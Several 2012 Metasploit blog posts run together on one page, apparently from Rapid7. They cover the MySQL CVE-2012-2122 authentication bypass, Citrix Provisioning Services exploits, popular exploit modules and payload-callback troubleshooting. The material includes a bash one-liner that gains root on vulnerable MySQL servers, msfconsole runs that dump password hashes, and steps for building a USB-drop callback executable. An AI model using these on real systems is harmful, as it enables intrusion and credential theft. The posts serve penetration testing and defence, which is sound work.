Metasploit Pro customers can quickly test all SSH servers identified in their current workspace. Just choose the Bruteforce component, set the Depth to "known only", select only the SSH-PUBKEY protocol, and under Advanced Options, paste the SSH public key into the Additional Credentials field. Launch the Bruteforce task and wait for it to complete. Any vulnerable systems will now have a public key credential associated with them in the Credentials tab of the host view and listed in the Authentication Tokens report.

 

Metasploit Framework and Pro command-line users can accomplish the same thing through the Metasploit console.

 

To get started, place the target SSH key into a text file on the local filesystem ("f5.pub") and launch msfconsole


$ msfconsole

msf > use auxiliary/scanner/ssh/ssh_identify_pubkeys

msf  auxiliary(ssh_identify_pubkeys) > set USERNAME root

msf  auxiliary(ssh_identify_pubkeys) > set KEY_FILE f5.pub

msf  auxiliary(ssh_identify_pubkeys) > set RHOSTS 192.168.0.5

msf  auxiliary(ssh_identify_pubkeys) > run

 

[*] 192.168.0.5:22 SSH - Trying 1 cleartext key per user.

[+] 192.168.0.5:22 SSH - [1/1] - Accepted: 'root' with key '71:3a:b0:18:e2:6c:41:18:4e:56:1e:fd:d2:49:97:66' - SCCP Superuser

[*] Scanned 1 of 1 hosts (100% complete)

[*] Auxiliary module execution completed


If you'd like to give this a try yourself, download Metasploit now.

 

Introduction

 

On Saturday afternoon Sergei Golubchik posted to the oss-sec mailing list about a recently patched security flaw (CVE-2012-2122) in the MySQL and MariaDB database servers. This flaw was rooted in an assumption that the memcmp() function would always return a value within the range -128 to 127 (signed character). On some platforms and with certain optimizations enabled, this routine can return values outside of this range, eventually causing the code that compares a hashed password to sometimes return true even when the wrong password is specified. Since the authentication protocol generates a different hash each time this comparison is done, there is a 1 in 256 chance that ANY password would be accepted for authentication.

 

In short, if you try to authenticate to a MySQL server affected by this flaw, there is a chance it will accept your password even if the wrong one was supplied. The following one-liner in bash will provide access to an affected MySQL server as the root user account, without actually knowing the password.

 

$ for i in `seq 1 1000`; do mysql -u root --password=bad -h 127.0.0.1 2>/dev/null; done

mysql>


 

Exploitability

 

Although a wide range of MySQL and MariaDB versions use the vulnerable code, only some of these systems are exploitable. It boils down to whether the memcmp() routine returns values outside of the unsigned character range. According to Sergei, this is normally not the case, and the routine is normally compiled into the server as an inline function. The major exception is when GCC uses SSE optimization. Joshua Drake, a security researcher with Accuvant Labs, provided a sample application that can determine whether your system might be affected. On most systems, the results of this application match the MySQL package provided by the distribution, but the only way to be sure is to actually test it.

 

If you'd like to give this a try yourself, download Metasploit now for free.


So far, the following systems have been confirmed as vulnerable:

  • Ubuntu Linux 64-bit ( 10.04, 10.10, 11.04, 11.10, 12.04 ) ( via many including @michealc )
  • OpenSuSE 12.1 64-bit MySQL 5.5.23-log ( via @michealc )
  • Debian Unstable 64-bit 5.5.23-2 ( via @derickr )
  • Fedora ( via hexed  and confirmed by Red Hat )
  • Arch Linux (unspecified version)

 

Feedback so far indicates the following platforms are NOT vulnerable:

  • Official builds from MySQL and MariaDB (including Windows)
  • Red Hat Enterprise Linux 4, 5, and 6 (confirmed by Red Hat)
  • CentOS using official RHEL rpms
  • Ubuntu Linux 32-bit (10.04, 11.10, 12.04, likely all)
  • Debian Linux 6.0.3 64-bit (Version 14.14 Distrib 5.5.18)
  • Debian Linux lenny 32-bit 5.0.51a-24+lenny5 ( via @matthewbloch )
  • Debian Linux lenny 64-bit 5.0.51a-24+lenny5 ( via @matthewbloch )
  • Debian Linux lenny 64-bit 5.1.51-1-log ( via @matthewbloch )
  • Debian Linux squeeze 64-bit 5.1.49-3-log ( via @matthewbloch )
  • Debian Linux squeeze 32-bit 5.1.61-0+squeeze1 ( via @matthewbloch )
  • Debian Linux squeeze 64-bit 5.1.61-0+squeeze1 ( via @matthewbloch )
  • Gentoo 64-bit 5.1.62-r1 ( via @twit4c )
  • SuSE 9.3 i586 MySQL 4.1.10a ( via @twit4c )
  • OpenIndiana oi_151a4 5.1.37 ( via @TamberP )
  • FreeBSD 64-bit (many versions)

 

 

Most Linux vendors should have a patch out soon, if not already.


 

Caveats and Defense

 

The first rule of securing MySQL is to not expose to the network at large in the first place. Most Linux distributions bind the MySQL daemon to localhost, preventing remote access to the service. In cases where network access must be provided, MySQL also provides host-based access controls. There are few use cases where the MySQL daemon should be intentionally exposed to the wider network and without any form of host-based access control.


If you are responsible for a MySQL server that is currently exposed to the network unnecessarily, the easiest thing to do is to modify the my.cnf file in order to restrict access to the local system. Open my.cnf with the editor of your choice, find the section labeled [mysqld] and change (or add a new line to set) the "bind-address" parameter to "127.0.0.1". Restart the MySQL service to apply this setting.



Real-world Version Information

 

Pulling from the resources of a personal side project, I was able to derive some statistics about the real-world impact of this vulnerability. This project managed to find and gather the initial handshake for approximately 1.74 million MySQL servers across the internet at large. This statistic only includes MySQL instances that were on hosts publicly exposed to the internet and not bound to localhost.

 

Host Access Control

 

Of the 1.74 million MySQL servers identified, slightly more than 50% did not enforce host-based access controls ( 879,046 vs 863,920 ). The data was gathered by scanning randomly generated IPs across the entire addressable IPv4 unicast range, excluding networks known to be "dark" or where the network administrators had opted out of the survey.

 

MySQL Version Numbers

 

If we break down the list of accessible servers by version, we can see that the 5.0.x version series accounts for over 356,000 of the entire set, followed by 285,000 running a 5.1.x version, and 134,436 running a 5.5.x version. Doing the same type of analysis on the build flavor highlights how easy it is to identify Ubuntu (43,900), Debian (6,408), and Windows (98,665) MySQL services from the banners alone. Knowing that most Ubuntu 64-bit builds are likely to be vulnerable, the real question is how many of those nearly 44,000 Ubuntu systems are running 64-bit editions of the operating system.



Making the Most of It

 

If you are approaching this issue from the perspective of a penetration tester, this will be one of the most useful MySQL tricks for some time to come. One feature of Metasploit you should be familiar with is the mysql_hashdump module. This module uses a known username and password to access the master user table of a MySQL server and dump it into a locally-stored "loot" file. This can be easily cracked using a tool like John the Ripper, providing clear-text passwords that may provide further access.

 

This evening Jonathan Cran (CTO of Pwnie Express and Metasploit contributor) committed a threaded brute-force module that abuses the authentication bypass flaw to automatically dump the password database. This ensures that even if the authentication bypass vulnerability is fixed, you should still be able to access the database using the cracked password hashes. A quick demonstration of this module is shown below using the latest Metasploit Framework GIT/SVN snapshot.


$ msfconsole

msf > use auxiliary/scanner/mysql/mysql_authbypass_hashdump

msf  auxiliary(mysql_authbypass_hashdump) > set USERNAME root

msf  auxiliary(mysql_authbypass_hashdump) > set RHOSTS 127.0.0.1

msf  auxiliary(mysql_authbypass_hashdump) > run

 

[+] 127.0.0.1:3306 The server allows logins, proceeding with bypass test

[*] 127.0.0.1:3306 Authentication bypass is 10% complete

[*] 127.0.0.1:3306 Authentication bypass is 20% complete

[*] 127.0.0.1:3306 Successfully bypassed authentication after 205 attempts

[+] 127.0.0.1:3306 Successful exploited the authentication bypass flaw, dumping hashes...

[+] 127.0.0.1:3306 Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D

[+] 127.0.0.1:3306 Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D

[+] 127.0.0.1:3306 Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D

[+] 127.0.0.1:3306 Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D

[+] 127.0.0.1:3306 Saving HashString as Loot: debian-sys-maint:*C59FFB311C358B4EFD4F0B82D9A03CBD77DC7C89

[*] 127.0.0.1:3306 Hash Table has been saved: 20120611013537_default_127.0.0.1_mysql.hashes_889573.txt

[*] Scanned 1 of 1 hosts (100% complete)

[*] Auxiliary module execution completed


 


This week's update has a nice new asymmetric DoS condition module, a bunch of churn in Metasploit's Rails components, and some new Citrix attacks, so let's get right into it.

 

Fuzzing for Citrix Opcodes

 

This week's update includes three new exploits for Citrix Provisioning Services, the solution by Citrix "to stream a single desktop image to create multiple virtual desktops on one or more servers in a data center" (vendor quote). These modules exploit the same code JITED by the .NET Manager.dll component used by the StreamProcess.exe service (and patched in http://support.citrix.com/article/CTX130846):

0:012> kb
ChildEBP RetAddr  Args to Child
04d3f37c 012ba6c4 04d3f4d4 04e40042 ffffffff MSVCR90!wcsncpy
[f:\dd\vctools\crt_bld\self_x86\crt\src\wcsncpy.c @ 43]
04d3f424 7c809bbf ffffffff 04d3f450 04d3f454 0x12ba6c4
04d3f444 7c809b89 ffffffff 04c20000 00010000 kernel32!VirtualFreeEx+0x37
04d3f45c 79e8d09b 04c20000 00000000 79e8d0b7 kernel32!VirtualFree+0x15
04d3f494 79e8d0cb 04c20000 00000000 00008000 mscorwks!EEVirtualFree+0x95
04d3f4a8 79082ba9 7a3bdc9c 04c20000 00000000
mscorwks!CExecutionEngine::ClrVirtualFree+0x11
04d3f4cc 79082b6d 790b0000 7907799d 790b7064
mscorjit!norls_allocator::nraToss+0x44
04d3f4d8 790b7064 00000000 79076f16 79065d56
mscorjit!norls_allocator::nraRlsm+0x13
04d3f4e0 79076f16 79065d56 70410543 00000000 mscorjit!___PchSym_+0x2c
04d3f588 79fc71b7 04d3f780 79fc71db 7045188c mscorjit!jitNativeCode+0x12f
04d3f5e4 79fc722d 001a6a28 04d3f738 04d3f6b0
mscorwks!invokeCompileMethodHelper+0x91
04d3f62c 79fc8da9 035d86fc 04c32830 00000571 mscorwks!invokeCompileMethod+0x31
04d3f66c 79f908a1 79fc357e 70451bf0 035d86fc
mscorwks!CallCompileMethodWithSEHWrapper+0xaa
04d3fa18 001f0578 04d3fa54 79e7a14a 04d3faf0
mscorwks!Thread::StackWalkFramesEx+0x109
00000000 00000000 00000000 00000000 00000000 0x1f0578

 

With the new modules, now four different paths can be taken to exploit Citrix Provisioning Services. Two of the vulnerable opcodes were disclosed through ZDI advisories (0x40020000 and 0x40020006) while the other two (0x40020002 and 0x40020004) were posted as private exploits. With a little bit of fuzzing, Metasploit exploit developer Juan Vazquez was able to make streamprocess.exe crash with opcodes 0x40020002, 0x40020004, and 0x40020006. Combined with the awesome DEP bypass found by the contributor "Alino" (author of the citrix_streamprocess_data_msg.rb module which exploits the 0x40020000 opcode), we have all the known opcode paths available for Metasploit users.

 

Here's a complete list of available opcodes can be obtained from the disassemble of the "Manager.dll" component:

 

seg000:1D558 Ardence.CManagerRequestReceiver.dispatchPacket
             ldc.i4 0x40020000
seg000:21803 Ardence.CProtocol.Build_MGR_VDISK_CREATE_REQUEST
             ldc.i4 0x4002000A
seg000:218E4 Ardence.CProtocol.GetMgrVdiskDeleteRequest
             ldc.i4 0x4002000B
seg000:218F4 Ardence.CProtocol.GetMgrVdiskDescribeContainerRequest
             ldc.i4 0x4002000F
seg000:21904 Ardence.CProtocol.GetMgrVdiskGetHeaderRequest
             ldc.i4 0x40020000
seg000:21915 Ardence.CProtocol.GetMgrVdiskSetHeaderRequest
             ldc.i4 0x40020001
seg000:21925 Ardence.CProtocol.GetMgrVdiskSetFooterRequest
             ldc.i4 0x40020003
seg000:21935 Ardence.CProtocol.GetMgrVdiskSetBootRecordRequest
             ldc.i4 0x40020005
seg000:21943 Ardence.CProtocol.Build_MGR_VDISK_LIST_REQUEST
             ldc.i4 0x4002000E
seg000:21973 Ardence.CProtocol.Build_MGR_VDISK_LIST_DIRECTORIES_REQUEST
            ldc.i4 0x40020019
seg000:219A3 Ardence.CProtocol.Build_MGR_VDISK_CREATE_DIRECTORY_REQUEST
            ldc.i4 0x4002001A
seg000:219C3 Ardence.CProtocol.Build_MGR_VDISK_REMOVE_DIRECTORY_REQUEST
            ldc.i4 0x4002001B
seg000:219EC Ardence.CProtocol.Build_MGR_VDISK_CHECK_SIDECAR_REQUEST
             ldc.i4 0x40020017
seg000:21AD3 Ardence.CProtocol.Build_MGR_VDISK_LOCK_REQUEST
             ldc.i4 0x40020010
seg000:21B33 Ardence.CProtocol.Build_MGR_VDISK_UNLOCK_REQUEST
             ldc.i4 0x40020011
seg000:21B84 Ardence.CProtocol.GetMgrVdiskIsLockedRequest
             ldc.i4 0x40020013
seg000:21B94 Ardence.CProtocol.GetMgrVdiskReleaseAllLocksRequest
             ldc.i4 0x40020012
seg000:21BA4 Ardence.CProtocol.GetMgrVdiskGetLockInfoRequest
             ldc.i4 0x40020014
seg000:21C04 Ardence.CProtocol.GetMgrVdiskGetFooterRequest
             ldc.i4 0x40020002
seg000:21C64 Ardence.CProtocol.GetMgrVdiskGetBootRecordRequest
             ldc.i4 0x40020004
seg000:21C73 Ardence.CProtocol.Build_MGR_VDISK_GET_OBJECTS_REQUEST
             ldc.i4 0x40020006
seg000:22314 Ardence.CProtocol.GetMgrVdiskCheckRequest
             ldc.i4 0x40020015
seg000:22325 Ardence.CProtocol.GetMgrVdiskCheckFreeSpaceRequest
             ldc.i4 0x40020016
seg000:2235C Ardence.CProtocol.Build_MGR_VDISK_DELETE_DEVICE_DISK_CACHE_FILE_REQUEST
             ldc.i4 0x40020018
seg000:2AE27 Ardence.CRemoteManagedVdisk.handleCreateRequest
             ldc.i4 0x4002000A
seg000:2B30D Ardence.CRemoteManagedVdisk.handleCancelCreateRequest
             ldc.i4 0x4002000C
seg000:2B65D Ardence.CRemoteManagedVdisk.handleGetCreateProgressRequest
            ldc.i4 0x4002000D
seg000:2BAFD Ardence.CRemoteManagedVdisk.handleDeleteRequest
             ldc.i4 0x4002000B
seg000:2BE3D Ardence.CRemoteManagedVdisk.handleDescribeContainerRequest
            ldc.i4 0x4002000F
seg000:2C18D Ardence.CRemoteManagedVdisk.handleGetBootRecordRequest
             ldc.i4 0x40020004
seg000:2C4DD Ardence.CRemoteManagedVdisk.handleGetObjectsRequest
             ldc.i4 0x40020006
seg000:2C89D Ardence.CRemoteManagedVdisk.handleGetFooterRequest
             ldc.i4 0x40020002
seg000:2CBED Ardence.CRemoteManagedVdisk.handleGetHeaderRequest
             ldc.i4 0x40020000
seg000:2CF4D Ardence.CRemoteManagedVdisk.handleListRequest
             ldc.i4 0x4002000E
seg000:2D2ED Ardence.CRemoteManagedVdisk.handleListDirectoriesRequest
             ldc.i4 0x40020019
seg000:2D68D Ardence.CRemoteManagedVdisk.handleCreateDirectoryRequest
             ldc.i4 0x4002001A
seg000:2D9FD Ardence.CRemoteManagedVdisk.handleRemoveDirectoryRequest
             ldc.i4 0x4002001B
seg000:2DD6D Ardence.CRemoteManagedVdisk.handleLockRequest
             ldc.i4 0x40020010
seg000:2E0CD Ardence.CRemoteManagedVdisk.handleUnlockRequest
             ldc.i4 0x40020011
seg000:2E41D Ardence.CRemoteManagedVdisk.handleCheckRequest
             ldc.i4 0x40020015
seg000:2E586 Ardence.CRemoteManagedVdisk.handleCheckRequest
             ldc.i4 0x40020015
seg000:2E69D Ardence.CRemoteManagedVdisk.handleIsLockedRequest
             ldc.i4 0x40020013
seg000:2E91D Ardence.CRemoteManagedVdisk.handleReleaseAllLocksRequest
             ldc.i4 0x40020012
seg000:2EC5D Ardence.CRemoteManagedVdisk.handleGetLockInfoRequest
             ldc.i4 0x40020014
seg000:2EFED Ardence.CRemoteManagedVdisk.handleSetFooterRequest
             ldc.i4 0x40020003
seg000:2F27D Ardence.CRemoteManagedVdisk.handleSetHeaderRequest
             ldc.i4 0x40020001
seg000:2F50D Ardence.CRemoteManagedVdisk.handleSetBootRecordRequest
             ldc.i4 0x40020005
seg000:2F9DD Ardence.CRemoteManagedVdisk.handleCheckFreeSpaceRequest
             ldc.i4 0x40020016
seg000:2FB50 Ardence.CRemoteManagedVdisk.handleCheckFreeSpaceRequest
             ldc.i4 0x40020016
seg000:2FC6D Ardence.CRemoteManagedVdisk.handleCheckSidecarRequest
             ldc.i4 0x40020017
seg000:2FEB9 Ardence.CRemoteManagedVdisk.handleCheckSidecarRequest
             ldc.i4 0x40020017
seg000:2FFCD Ardence.CRemoteManagedVdisk.handleDeleteDeviceDiskCacheFile
             ldc.i4 0x40020018

 

It's quite likely there are more crashes lurking in the code base, so fuzzing out a few more is left as an exercise to the reader.

When Hashes Collide

 

It's not often one module references four different CVE's across two different web technologies, but this week's update features just that: the Hashtable Collisions module submitted by Christian Mehlmauer, which incorporates his work along with Alexander Klink, Julian Waelde, Scott A. Crosby, Dan S. Wallach, and Krzysztof Kotowicz. The most complete reference about this vulnerability can be found over on oCERT, but the short story is, this module exercises an "algorithmic complexity" vulnerability with the way some (most) web application frameworks generate hash tables based on POST requests. Ultimately, vulnerable sites can end up eating hours of CPU time in the face of just a few requests, making for a classical asymmetric DoS condition. While this module may not have a lot of use in the course of a normal penetration testing engagement, it illustrates the kind of nifty research avenues that Metasploit modules can lend themselves to.

 

Rails Version Shuffle

 

As you may or may not know, both Metasploit Framework and Metasploit Pro both ship with Ruby on Rails as a core component. This last week, there was a SQL injection vulnerability announced that affects versions prior to 3.2.4. Although a code review showed that none of the Metasploit products were affected by the vulnerability, we updated to 3.2.4 with a better-safe-than-sorry attitude. Well, it turns out, 3.2.4 contained a show-stopper regression as well as the security fix. Given that we're not vulnerable to begin with, we've rolled back to 3.2.2 until we get a chance to test 3.2.5 more thoroughly (once bitten and all).

 

So, for those of you who track Metasploit changes via SVN or GitHub, that's why we've been shuffling around our Rails versions this week. Sorry for the commit spam!

 

Other New Modules with Links to our Exploit Database (DB)

 

 

Availability

 

If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding-edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration.

 

For additional details on what's changed and what's current, please see the most excellent release notes.

Exploit Database (DB)

Last month, we gave you a list of the top 10 most searched Metasploit exploit and auxiliary modules from our exploit database (DB). These stats are collected by analyzing searches on metasploit.com in our webserver logs, not through usage of Metasploit, which we do not track for privacy reasons.

 

We were curious how the list changed month over month, and now we have the first results for May 2012. As expected, most exploits only moved around a little but we also have 2 fun new entries. Here they are, annotated with Tod Beardley's excellent comments:

 

  1. Microsoft Server Service Relative Path Stack Corruption (CVE-2008-4250, MSB-MS08-067): A four year old vulnerability that tends to give the most reliable shells on Windows 2003 Server and Windows XP. It’s also got a great pile of language pack targets. All of Metasploit’s exploits provide US English targeted shellcode, a few might provide Chinese, Spanish, French, or other popular languages; this one has targets in pretty much every language you’ve ever heard of. This exploit is also not ancient, so it’s reasonable to expect to find some unpatched systems in a medium to large enterprise vulnerable to it. More on this topic at Microsoft’s Security TechCenter. Up 1 place from #2 since last month.

  2. MS12-020 Microsoft Remote Desktop Use-After-Free DoS (CVE-2012-0002, MSB-MS12-020): This is the 2012 RDP Bug, where it was implied -- but never proven in public -- that a pre-auth bug in RDP can allow for remote code execution. This is likely the most popular module we have due to both recency bias and because there was an unusual level of spontaneous organization of the Metasploit developer community to search for the correct path to remote code execution. So far, nobody’s gotten RCE yet (in public), but the Metasploit module provides the most clues. More on this topic in an article on ZD Net. Down 1 place from #1 since last month.

  3. Microsoft Server Service NetpwPathCanonicalize Overflow (CVE-2006-3439, MSB-MS06-040): A six year old vulnerability that’s notable in that there’s no official patch from Microsoft for this on Windows NT 4.0. This was discovered after NT went end-of-life, so if you need remote root on an NT machine (and there are still plenty out there), this is going to be your first choice. More on this topic in at Microsoft’s Security TechCenter. Same position as last month.

  4. CCTV DVR Login Scanning Utility: This auxiliary module rocketed to the top ten list with our recent guest blog post by Justin Cacak. The module scans for CCTV DVR video surveillance deployments by CTRing, MicroDigital, HIVISION, and a bunch of other rebranded devices. The module targets port 5920, which a lot of CCTV owners might not even realize is open, and tries default credentials (as well as optionally allowing more thorough bruteforcing). Since Justin's research and this module was was picked up by Slashdot, Wired, and other tech news outlets, it's not surprising to see it hit the top 10 list. New entry this month.

  5. PHP CGI Argument Injection: This module from mid-May of 2012 exploits CVE-2012-1823, a vulnerability in the way PHP-CGI handles parameters passed on GET requests. The vulnerability was discovered during a capture-the-flag exercise at NullCon in January 2012, and the bug's life cycle is pretty thoroughly documented over at De Eindbazen. Here's the short story: this bug, which allows for command execution via GET requests to PHP-CGI installtions, has been knocking around PHP installations since 2004. It was first reported to PHP in January of 2012 (yes, eight years after it was introduced), subsequently leaked accidentally in May of 2012, and actively exploited shortly thereafter. More info on this on a blog at Serge Security. New entry this month.

  6. Microsoft RPC DCOM Interface Overflow (CVE-2003-0352, MSB-MS03-026): A nine year old vulnerability that used to be the de-facto standard exploit for Windows machines - this is the RPC DCom bug, and it affects ancient NT machines. It was most notable in that it was used by the Blaster and Nachi worms to transit networks. It’s now pretty much a case study in stack buffer overflows in Windows, so it’s got a lot of historical value. If memory serves, this was the most reliable exploit in Metasploit v2. More info on that at Windows IT Pro. Down 2 places from #4 since last month.

  7. Microsoft Windows 7 / Server 2008 R2 SMB Client Infinite Loop (CVE-2010-0017, MSB-MS10-006): Not sure why this module is popular -- it’s a client side DoS. Historically, it’s a neat DoS, since it demos a bug in Windows 7’s kernel, but all the module does is crash Windows 7 clients after you get a user to connect to you. More info on that at The H Security. Down 2 places from #5 since last month.

  8. Adobe PDF Embedded EXE Social Engineering (CVE-2010-1240): This module exploits CVE-2010-1240 in Adobe Reader. The idea is that you can embed and execute a Meterpreter PE Executable in a PDF, and when the user opens the PDF, surprise shells! Since it’s on this list, it’s probably the most popular social engineering-style module. More on this topic in at the National Vulnerability Database.  Down 2 places from #6 since last month.

  9. Apache mod_isapi <= 2.2.14 Dangling Pointer (CVE-2010-0425): Although this is an exploit in Apache, don’t be fooled! It’s only exploitable on Windows (so that knocks out the biggest chunk of Apache installs at the time of this module’s release), and it’s only a DoS. Again, kind of a mystery as to why it’s so popular. More info on that at Technolyze Blogs. Down 2 places from #7 since last month.

  10. Microsoft Windows Authenticated User Code Execution (CVE-1999-0504): The PSExec module is a utility module -- given an SMB username and password with sufficient privileges on the target machine, the user can get a shell. It’s not sexy, but it’s super handy for testing payloads and setup. Even though it’s a lowly #10, I’d bet it’s the most-used module in classroom and test environments. More on this topic in at the National Vulnerability Database. Down 1 place from #9 since last month.

 

Do you have your own theory on why the exploits are trending the way they are? If so, please let us know in the comments below.

 

If you want to use any of these exploits right now, you can download Metasploit for free!

Webcast Password Auditing with Metasploit.jpgDavid Maloney's webcast for for network administrators and security engineers is now available online. David discusses weaknesses in password-based authentication on clients and servers and how to audit these as part of a regular security program.

 

What you'll learn in this webcast

 

  • Password storage systems and password obfuscation
  • Strengths and weaknesses of the various approaches
  • Real-life examples of badly implemented password authentication mechanisms
  • How to audit passwords on your network using Metasploit Pro

 

Audience questions answered in this webcast

 

  • What do you think about modifying standard ciphers, for example MD5 constants or AES S-boxes?
  • Do you know if Putty saves its sessions in a secure way?
  • Which FTP and SSH applications have good password protection?
  • Do you know about password security issues with popular VPN clients?
  • I know of a password that many people in my environment are using. Is there a way to audit my network for just that password?
  • Which Metasploit editions is the scheduled password auditing available in?
  • You mentioned basic HTTP Authentication. Which method should I use?
  • Were all the hashes you cracked LM hashes?
  • Can you expand a little on the registry areas that usually contain passwords?
  • What are the differences between Metasploit Community and Metasploit Pro? Is it only the graphical user interface? Or am I able to run more exploits or zero-day exploits?
  • What are your thoughts on browsers that save credentials for future use?

 

About David Maloney

 

David is a Software Engineer on Rapid7’s Metasploit team, where he is responsible for development of core features for the commercial Metasploit editions. Before Rapid7, he worked as a Security Engineer and Penetration Tester at Time Warner Cable and as an Application Security Specialist for a global insurance company. David has been a long-time community contributor to the Metasploit Framework. He is one of the founders of Hackerspace Charlotte and is an avid locksport enthusiast.

 

View the Password Auditing Webcast Now

It can be very frustrating to try exploiting machines and not succeeding, especially if your vulnerability report is showing a lot of vulnerabilities on the hosts you are trying to exploit. This is usually due to one of the following reasons:

 

  1. Not all reported vulnerabilities are exploitable. It may be because a firewall or IPS/IDS is successfully stopping the attack, or simply because your vulnerability scanner reported a false positive.
  2. Your Metasploit machine or network connection may prohibit a session from being opened.

 

If you think the latter may be the case, please ensure the following:

 

  1. Firewalls must be disabled on your Metasploit machine so the payload can connect back to the Metasploit machine after an exploit succeeded. The default port for this connection is 4444.
  2. You must disable (or even better uninstall) any anti-virus software before installing Metasploit because it may interfere with the installation because Metasploit exploits the same vulnerabilities as malware and is therefore stopped by some anti-virus software.

 

If you have checked all of the above but still cannot get a session, then you should try if your Metasploit installation is set up so that the Metasploit payload can actually connect back to Metasploit after a machine has been exploited. To do this, we'll launch a small executable on the target machine that connects back to Metasploit to create a session. If this test is successful, you'll know that there are no firewalls or configuration issues stopping the payload from connecting back to Metasploit. This test requires Metasploit Pro - if you don't have this version, simply register for a 7-day Metasploit Pro trial to do this test.

 

For this test, I'll be using two machines:

 

Metasploit HostTarget Host
  • Runs Metasploit Pro
  • Target host for test
  • Use browser to connect to Metasploit host
  • Download and execute ClickMe.exe here
10.1.95.7410.1.95.59
Ubuntu (for this test - Windows also works)Windows (required for testing with ClickMe.exe)

 

The little executable we'll be using is usually used for USB campaigns, which involve dropping USB keys in your target's parking lot and bathroom to see if anyone will plug the USB thumb drive into their machine and double-click the executable. While it was built for a different purpose, it will work just fine to test the inbound connection to Metasploit.

 

Here's how to test:

 

  1. The easiest way to get the executable to your test machine is to download it through the browser, so you should go to the Windows target machine and enter "https://" plus the IP adddress of the Metasploit machine with on port 3790, so in this example the link is https://10.1.95.74:3790. If you cannot connect from the target to the Metasploit machine, find out why - this may be the reason why you are not getting sessions.
  2. Since the SSL certificate is self-signed, you'll get a warning that it isn't trusted. Add an exception to allow this certificate to proceed.
  3. Log in.
  4. Create a new project or enter a test project that you've already set up.
  5. Click on the Campaigns button.
  6. Click on New Campaign
  7. Enter Test as the name for the campaign and the IP address of the Metasploit host in the field "Listener Bind IP".
    Listener Bind IP.jpg
  8. Activate the checkbox "Generate an executable for manual delivery".
    USB Drive Campaign.jpg
  9. Ensure that the "Listener callback IP" also uses the Metasploit host's IP address.
    Payload settings.jpg
  10. Save the campaign.
  11. Click on Start Campaign. The campaign settings should now look like this:
    Campaign settings.jpg
  12. Click on Download Executable and download "ClickMe.exe" to the Windows host.
  13. Open and run "ClickMe.exe" on the Windows host. The file will execute but you will not see any user interface.
  14. Return to the browser on the Windows machine and click on the Sessions tab. You should now see an open session. Note also the 1 in a blue circle next to the Sessions tab, indicating one active session.
    Successful sessoin.jpg

 

If you've successfully opened a session, your Metasploit host is correctly configured to receive connections from exploited machines.

 

If you are not getting a session on the machine, here are a couple of things you can try to identify the issue:


  • On the Metasploit host, check if the Metasploit service is listening on port 4444. On Ubuntu, open the terminal window and type netstat -an | grep 4444. The response should be:
    Listening on port 4444.jpg
    If the Metasploit host is not listening, please ensure that the campaign is really started.
  • Verify that no firewall is active on the Metasploit host
  • Verify that no anti-virus is active on the Metasploit host
  • If you are having trouble executing the ClickMe.exe file, then you may have anti-virus blocking execution on the target machine. Disable AV, download the file and try again. Turn AV back on once you have completed the test.

 

If you're still having trouble getting Metasploit to work, please post your question in the Metasploit discussion forums (posting requires login/registration).

Filter Blog

By date: By tag: